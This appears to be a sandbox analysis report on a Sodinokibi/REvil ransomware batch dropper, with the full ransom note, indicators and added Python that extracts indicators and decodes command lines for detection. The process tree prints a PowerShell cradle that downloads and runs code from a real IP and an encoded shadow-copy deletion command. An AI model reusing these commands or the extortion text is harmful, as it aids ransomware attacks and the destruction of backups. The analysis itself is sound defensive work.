Analysis

  • max time kernel
    136s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    10-06-2020 04:10

General

  • Target

    a4aca9057cc10618a79ca8151afec479.bat

  • Size

    217B

  • MD5

    e1599c1a16de36f62fc0cc3af1ac017f

  • SHA1

    471367e29f86a7207c149cc46017217291006678

  • SHA256

    9bf30b808e78d5a9b262780e6b3c1479f5886a5026f781e38b057fa90d17ad43

  • SHA512

    e3cfa4040bd5cfcc5e80a141c88d7e2bfe44cccaf83bab2fac65b432c52d66aad6eaf23b607cc78970710d17eef2559adbe1b42ee482bb04e73536ddd214993e

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479

Extracted

Path

C:\hps44xbt0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome Drive America Holdings! Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension hps44xbt0.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9AA878A028CEE444

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.cc/9AA878A028CEE444

3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key
FXH+FrdNZSM6zrLpOMdpu8USBE9DvCUFQiuAYKf194G9HPiDuPFHt1UpXwLFVuDq
1Em7smPMQQ/srMG4NPvtYgsr/GZHoWs0avuLIICxsxKJ1Pi698fLtW8IzPS8mLme
Y0XI76mFZjKZ9Bma0VsorrmPSGn2fY4RH79QaJ2E6hUykIgp+bu0GRHUMMH6azKJ
MYugX9u1dvXOKhJRLBdy5BcjQRFoSzCG3ZWT+NC9+Hxs83CmfLqGBGf6S/5163QM
OstkMWXdxEQPTu+DB/XE3jDkyNnWDWSno3aK+2TATfgnlcVf6x09gGjX86j/jY4u
qNIOifuuA7E0ISVngRmHgQ7Xn9v5aLGNneWSEQEONxF4X5n9DLMEVsm6+OTlSb4O
nlvUhuCrfOybPvv/ZvIdkX5X8sp4IlzdDIU8i6dJTPShey1g2B4MP3TCFCVtPMm/
HcnWokeaCj48k8QJxE+ZFZ0WjscHHvtjKwRaeu2P0w0YeqXBNSEBaKLlsHn6XE0k
1ZRJKi+fVeUHVxcCixeRM1riZA88SrBCKnFLgsdudJHwu+S72+BcfBm5WHpQReB2
v2vBTNGZ/KBWfx3KHYVFJ2yKdmdZF6c5Lwg6NloNhZY1r/2L5f2Ewri31igw8sLY
IWt9L0+kpPGXRvTlgUuLNl4EvtPCGExOloCdEQvNCtrDyHMgieKiSS8EBPoA2CpD
wq7KwsdZeUXwAC88pEzUeV/VuB5bwCAFh8Ae+H/6V5d+c9gB3tvigHP9K9BMbsrG
crrwjJ2NrjOakD1JiDgZVarSETp9sv0B0Qqs5t6gMZd23Rp20aXqnwd3i1bVTmzP
olcKuNSieLb81a8uIjSeStiREcUkktwo6CN7dfOlXj6l4CBPPRBUKVUVYTkHc2Bv
Uirm5qtT2nO6vVOrZ7C5dOeBTl8IbtQ2Kb/g9usc7VlG4SUWzTWtc+UPE4wQ8QlN
clNxcjqq0pxC8JE8cfn3dFPyg8bNupuQVwbx6Hu2JcKr9VnPcwhwQBruL0kVAmuT
ayRRW0n7XoPCr+05ROf1XP4aUuti+ZTd9WCnHwlwjhnJQrY4ekNypxP5iqc8LFqQ
WuKAqCsVt3mHrc028scw0upCzEGvAnSmk1qXI+5S5I+K8QhisqHpb4P+NYylkrJR
knbLK6PTv226Wg7KxUtot5m75dSvpxH0S7ht/eblFxmnfvKwim+LhaQpkryHP4uO
0s15Ghf3QMW5r/0jC62fUFL7kBxlFsX4jYTQudRmDou1km4ndlSSGnZnZFWn36FC
thE5tJdrqfGUm+GGehw08Wx4nfyKhMN6q6PbGWA8VIKojszQfwI=
and extension hps44xbt0

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:
FXH+FrdNZSM6zrLpOMdpu8USBE9DvCUFQiuAYKf194G9HPiDuPFHt1UpXwLFVuDq
1Em7smPMQQ/srMG4NPvtYgsr/GZHoWs0avuLIICxsxKJ1Pi698fLtW8IzPS8mLme
Y0XI76mFZjKZ9Bma0VsorrmPSGn2fY4RH79QaJ2E6hUykIgp+bu0GRHUMMH6azKJ
MYugX9u1dvXOKhJRLBdy5BcjQRFoSzCG3ZWT+NC9+Hxs83CmfLqGBGf6S/5163QM
OstkMWXdxEQPTu+DB/XE3jDkyNnWDWSno3aK+2TATfgnlcVf6x09gGjX86j/jY4u
qNIOifuuA7E0ISVngRmHgQ7Xn9v5aLGNneWSEQEONxF4X5n9DLMEVsm6+OTlSb4O
nlvUhuCrfOybPvv/ZvIdkX5X8sp4IlzdDIU8i6dJTPShey1g2B4MP3TCFCVtPMm/
HcnWokeaCj48k8QJxE+ZFZ0WjscHHvtjKwRaeu2P0w0YeqXBNSEBaKLlsHn6XE0k
1ZRJKi+fVeUHVxcCixeRM1riZA88SrBCKnFLgsdudJHwu+S72+BcfBm5WHpQReB2
v2vBTNGZ/KBWfx3KHYVFJ2yKdmdZF6c5Lwg6NloNhZY1r/2L5f2Ewri31igw8sLY
IWt9L0+kpPGXRvTlgUuLNl4EvtPCGExOloCdEQvNCtrDyHMgieKiSS8EBPoA2CpD
wq7KwsdZeUXwAC88pEzUeV/VuB5bwCAFh8Ae+H/6V5d+c9gB3tvigHP9K9BMbsrG
crrwjJ2NrjOakD1JiDgZVarSETp9sv0B0Qqs5t6gMZd23Rp20aXqnwd3i1bVTmzP
olcKuNSieLb81a8uIjSeStiREcUkktwo6CN7dfOlXj6l4CBPPRBUKVUVYTkHc2Bv
Uirm5qtT2nO6vVOrZ7C5dOeBTl8IbtQ2Kb/g9usc7VlG4SUWzTWtc+UPE4wQ8QlN
clNxcjqq0pxC8JE8cfn3dFPyg8bNupuQVwbx6Hu2JcKr9VnPcwhwQBruL0kVAmuT
ayRRW0n7XoPCr+05ROf1XP4aUuti+ZTd9WCnHwlwjhnJQrY4ekNypxP5iqc8LFqQ
WuKAqCsVt3mHrc028scw0upCzEGvAnSmk1qXI+5S5I+K8QhisqHpb4P+NYylkrJR
knbLK6PTv226Wg7KxUtot5m75dSvpxH0S7ht/eblFxmnfvKwim+LhaQpkryHP4uO
0s15Ghf3QMW5r/0jC62fUFL7kBxlFsX4jYTQudRmDou1km4ndlSSGnZnZFWn36FC
thE5tJdrqfGUm+GGehw08Wx4nfyKhMN6q6PbGWA8VIKojszQfwI=

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!

!!! !!! ATTENTION !!! !!!
We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9AA878A028CEE444

http://decryptor.cc/9AA878A028CEE444
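The note above carries everything a responder needs to tag the incident: the victim name in the header, the new file extension, the per-victim ID that both portal URLs end in, and the attacker-supplied key blob. As an added example that is not part of the sandbox report, the Python below pulls those fields out of an excerpt of the note. The excerpt text is copied from the report; the regexes, field names and the data-leak heuristic are the author's own. Python is used for the added examples on this page because the work is analyst-side parsing and decoding of the report's artifacts.

```python
"""Pull indicators out of the Sodinokibi/REvil ransom note shown above.

Added example; not part of the sandbox report. NOTE_EXCERPT reproduces the
note's header, portal section, key block (once) and leak threat, copied
from the report; the regexes and field names are the author's own.
"""
import base64
import binascii
import re

NOTE_EXCERPT = """\
---=== Welcome Drive America Holdings! Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension hps44xbt0.
[+] How to get access on website? [+]
1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9AA878A028CEE444
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website.
  b) Open our secondary website: http://decryptor.cc/9AA878A028CEE444
When you open our website, put the following data in the input form:
Key:
FXH+FrdNZSM6zrLpOMdpu8USBE9DvCUFQiuAYKf194G9HPiDuPFHt1UpXwLFVuDq
1Em7smPMQQ/srMG4NPvtYgsr/GZHoWs0avuLIICxsxKJ1Pi698fLtW8IzPS8mLme
Y0XI76mFZjKZ9Bma0VsorrmPSGn2fY4RH79QaJ2E6hUykIgp+bu0GRHUMMH6azKJ
MYugX9u1dvXOKhJRLBdy5BcjQRFoSzCG3ZWT+NC9+Hxs83CmfLqGBGf6S/5163QM
OstkMWXdxEQPTu+DB/XE3jDkyNnWDWSno3aK+2TATfgnlcVf6x09gGjX86j/jY4u
qNIOifuuA7E0ISVngRmHgQ7Xn9v5aLGNneWSEQEONxF4X5n9DLMEVsm6+OTlSb4O
nlvUhuCrfOybPvv/ZvIdkX5X8sp4IlzdDIU8i6dJTPShey1g2B4MP3TCFCVtPMm/
HcnWokeaCj48k8QJxE+ZFZ0WjscHHvtjKwRaeu2P0w0YeqXBNSEBaKLlsHn6XE0k
1ZRJKi+fVeUHVxcCixeRM1riZA88SrBCKnFLgsdudJHwu+S72+BcfBm5WHpQReB2
v2vBTNGZ/KBWfx3KHYVFJ2yKdmdZF6c5Lwg6NloNhZY1r/2L5f2Ewri31igw8sLY
IWt9L0+kpPGXRvTlgUuLNl4EvtPCGExOloCdEQvNCtrDyHMgieKiSS8EBPoA2CpD
wq7KwsdZeUXwAC88pEzUeV/VuB5bwCAFh8Ae+H/6V5d+c9gB3tvigHP9K9BMbsrG
crrwjJ2NrjOakD1JiDgZVarSETp9sv0B0Qqs5t6gMZd23Rp20aXqnwd3i1bVTmzP
olcKuNSieLb81a8uIjSeStiREcUkktwo6CN7dfOlXj6l4CBPPRBUKVUVYTkHc2Bv
Uirm5qtT2nO6vVOrZ7C5dOeBTl8IbtQ2Kb/g9usc7VlG4SUWzTWtc+UPE4wQ8QlN
clNxcjqq0pxC8JE8cfn3dFPyg8bNupuQVwbx6Hu2JcKr9VnPcwhwQBruL0kVAmuT
ayRRW0n7XoPCr+05ROf1XP4aUuti+ZTd9WCnHwlwjhnJQrY4ekNypxP5iqc8LFqQ
WuKAqCsVt3mHrc028scw0upCzEGvAnSmk1qXI+5S5I+K8QhisqHpb4P+NYylkrJR
knbLK6PTv226Wg7KxUtot5m75dSvpxH0S7ht/eblFxmnfvKwim+LhaQpkryHP4uO
0s15Ghf3QMW5r/0jC62fUFL7kBxlFsX4jYTQudRmDou1km4ndlSSGnZnZFWn36FC
thE5tJdrqfGUm+GGehw08Wx4nfyKhMN6q6PbGWA8VIKojszQfwI=
!!! !!! ATTENTION !!! !!!
We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
"""

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
ONION_RE = re.compile(r"^https?://[^/]+\.onion(?:/|$)", re.I)
VICTIM_ID_RE = re.compile(r"/([0-9A-F]{16})$")          # 16 hex chars at the end of a portal URL
EXT_RE = re.compile(r"\bextension\s+([A-Za-z0-9]+)")
VICTIM_NAME_RE = re.compile(r"Welcome\s+(.+?)!")
KEY_RE = re.compile(r"Key:\s*((?:[A-Za-z0-9+/=]{40,}\s*)+)")  # run of long base64 lines after "Key:"
LEAK_RE = re.compile(r"post your confidential files|sell part of them", re.I)


def extract_iocs(note):
    """Return a dict of indicators parsed from a REvil-style note."""
    urls = URL_RE.findall(note)
    victim_ids = sorted({VICTIM_ID_RE.search(u).group(1) for u in urls if VICTIM_ID_RE.search(u)})
    # Payment portals are the URLs that carry the per-victim ID; torproject.org is benign.
    portals = [u for u in urls if any(vid in u for vid in victim_ids)]
    m = KEY_RE.search(note)
    key_b64 = re.sub(r"\s+", "", m.group(1)) if m else None
    try:
        key_bytes = len(base64.b64decode(key_b64, validate=True)) if key_b64 else None
    except binascii.Error:
        key_bytes = None  # malformed or truncated blob: keep the text, do not crash
    exts = sorted(set(EXT_RE.findall(note)))
    name = VICTIM_NAME_RE.search(note)
    return {
        "victim_name": name.group(1) if name else None,
        "extension": exts[0] if len(exts) == 1 else exts,
        "victim_ids": victim_ids,
        "onion_urls": [u for u in portals if ONION_RE.match(u)],
        "clearnet_urls": [u for u in portals if not ONION_RE.match(u)],
        "key_b64": key_b64,
        "key_bytes": key_bytes,
        "data_leak_threat": bool(LEAK_RE.search(note)),
    }


if __name__ == "__main__":
    for field, value in extract_iocs(NOTE_EXCERPT).items():
        print(f"{field}: {value if field != 'key_b64' else value[:32] + '...'}")
```

The extension and victim ID are the two values to pivot on: the extension names the readme file (C:\hps44xbt0-readme.txt in the Extracted section) and the ID is what other hosts hit by the same run will show in their own notes.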

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 175 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\a4aca9057cc10618a79ca8151afec479.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479');Invoke-HVGROAEJEA;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Drops file in System32 directory
      PID:1480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1832
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1604
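The chain above is cmd.exe running the .bat, which launches a 32-bit PowerShell download cradle (IEX over WebClient.DownloadString from 185.103.242.78, then a 10000-second Start-Sleep to keep the session alive), and a child PowerShell with a base64 -e argument. That argument is UTF-16LE text under base64, which is why the blob is full of `A`-padded groups; it decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, the shadow-copy wipe consistent with vssvc.exe appearing in the tree with AdjustPrivilegeToken. As an added example that is not part of the sandbox report, the Python below decodes that payload and applies a few triage rules to all three command lines. The command strings are copied from the report; the decoder, rule names and regexes are the author's own and are deliberately narrow.

```python
"""Decode and triage the PowerShell command lines from the process tree above.

Added example; not part of the sandbox report. The three command lines are
copied from the report verbatim; the decoder and the classification rules
are the author's own.
"""
import base64
import re

# Command lines exactly as the report shows them, keyed by PID.
CMDLINES = {
    1312: 'cmd /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\a4aca9057cc10618a79ca8151afec479.bat"',
    1480: ("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
           "\"IEX (New-Object System.Net.WebClient).DownloadString("
           "'http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479');"
           "Invoke-HVGROAEJEA;Start-Sleep -s 10000\""),
    1832: ("powershell -e "
           "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
           "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    The payload is base64 over UTF-16LE, so every other byte of the decoded
    data is NUL; that is what produces the repeated 'A' groups in the blob.
    """
    for m in FLAG_RE.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                return base64.b64decode(m.group(2)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


# Behaviours worth flagging in this chain. Each rule runs over the raw command
# line plus its decoded payload, so encoding does not hide the intent.
RULES = [
    ("download_cradle",
     re.compile(r"(?:IEX|Invoke-Expression)\b.*(?:Net\.WebClient|DownloadString|DownloadFile)", re.I)),
    ("shadow_copy_deletion",
     re.compile(r"Win32_Shadowcopy.*Delete|vssadmin(?:\.exe)?\s+delete\s+shadows"
                r"|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("long_sleep",  # keeps the stage-2 session resident after the payload has run
     re.compile(r"Start-Sleep\s+-s(?:econds)?\s+\d{4,}", re.I)),
]


def triage(cmdline):
    """Return (decoded payload or None, sorted list of matching rule names)."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    tags = [name for name, rx in RULES if rx.search(text)]
    if decoded is not None:
        tags.append("encoded_command")
    return decoded, sorted(tags)


def triage_tree(cmdlines):
    """Triage every process in the tree; returns {pid: tags}."""
    return {pid: triage(cmd)[1] for pid, cmd in cmdlines.items()}


if __name__ == "__main__":
    for pid, cmd in CMDLINES.items():
        decoded, tags = triage(cmd)
        print(f"PID {pid}: {tags}")
        if decoded:
            print(f"  decoded: {decoded}")
```

Running it prints nothing for PID 1312, download_cradle and long_sleep for PID 1480, and encoded_command plus shadow_copy_deletion for PID 1832 together with the decoded WMI one-liner. Keying the rules on the decoded text is the point: a detection that only inspects the raw command line never sees Win32_Shadowcopy here.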

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms